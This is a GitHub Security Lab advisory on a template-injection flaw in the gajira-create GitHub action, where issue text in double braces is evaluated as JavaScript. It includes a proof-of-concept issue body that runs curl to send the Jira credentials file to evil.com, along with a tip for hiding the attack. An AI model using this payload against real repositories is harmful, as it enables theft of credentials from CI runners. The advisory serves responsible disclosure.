GHSL-2020-172: Undocumented template expression evaluation in the gajira-create GitHub action - CVE-2020-14188

Summary

The gajira-create GitHub action supports undocumented template syntax that may lead to arbitrary code execution.

Product

gajira-create GitHub action

Tested Version

2.0.0

Details

Issue: The potentially untrusted input values summary and description are evaluated as code by node.js

The action supports additional template transformation of the summary and description input values - all placeholders between double braces like `` are replaced with the according values from github.event context. The intention most probably was to use it like:

uses: atlassian/gajira-create@v2.0.0
with:
    summary: |
    Issue {{ event.issue.title }} created by {{ event.issue.user.login }}
    description: |
    {{ event.issue.body }}

i.e. without the dollar sign and the root github context object.

However this feature is not documented and the built-in GitHub context expressions are used by the users of the action instead, like:

uses: atlassian/gajira-create@v2.0.0
with:
    summary: |
    ${{ github.event.issue.title }}
    description: |
    ${{ github.event.issue.body }}

This may lead to a double template evaluation if the user input contains {{}} itself. There is even a public issue created by one of the action users that proves it does happen.

The internal template feature is implemented in a way that the user input is interpreted as javascript:

const _ = require('lodash')

_.templateSettings.interpolate = /{{([\s\S]+?)}}/g
const summaryTmpl = _.template(this.argv.summary)
const descriptionTmpl = _.template(this.argv.description)

this.argv.summary = summaryTmpl({ event: this.githubEvent })
this.argv.description = descriptionTmpl({ event: this.githubEvent })

Impact

This vulnerability allows for arbitrary code execution in the context of a GitHub runner. For example a user may create an issue with the title It doesn't work on my machine and the body

{{ process.mainModule.require('child_process').exec(`curl -d @${process.env.HOME}/.jira.d/credentials http://evil.com`) }}

which will exfiltrate the secret Jira API token to the attacker controlled server. To make the attack less visible an attacker may modify the body of the issue to Never mind my bad. and close it.

CVE

CVE-2020-14188

Coordinated Disclosure Timeline

• 10/14/2020: Report sent to vendor
• 10/14/2020: Vendor acknowledges report receipt
• 10/21/2020: Issue fixed in v2.0.1

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2020-172 in any communication regarding this issue.